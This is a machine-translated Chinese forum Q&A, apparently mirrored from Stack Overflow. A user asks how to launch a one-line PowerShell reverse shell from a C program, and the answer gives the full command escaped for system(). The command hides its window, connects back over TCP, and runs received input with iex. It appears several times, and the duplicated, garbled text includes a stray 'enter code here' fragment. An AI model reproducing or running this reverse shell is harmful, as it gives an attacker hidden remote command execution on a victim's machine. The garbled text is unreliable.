Python 如何使用C语言运行这个单行powershell反向shell
我尝试使用执行系统命令,但C不理解我何时通过powershell进入Python 如何使用C语言运行这个单行powershell反向shell,python,c,powershell,Python,C,Powershell,我尝试使用执行系统命令,但C不理解我何时通过powershell进入系统(“”) powershell反向外壳: powershell -W Hidden -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($by
系统(“”)代码>
powershell反向外壳:
powershell -W Hidden -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$send`enter code here`back2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
当我使用subprocess模块将这个rev shell用于python时,当我指定这个subprocess.call(“”)时,它工作得很好
请帮助我在C中使用这个rev shell:我不是100%确定,但我不久前在从C#执行powershellscript时遇到了类似的问题。也许类似的东西在c语言中也适用。C#代码:
盲目地将powershell粘贴到系统(“”)中是不够的代码>-必须用\
屏蔽每个嵌入的“
:
system("powershell -W Hidden -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$send`enter code here`back2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"");
您应该查看该命令-您可能不希望在此处输入代码
system("powershell -W Hidden -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$send`enter code here`back2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"");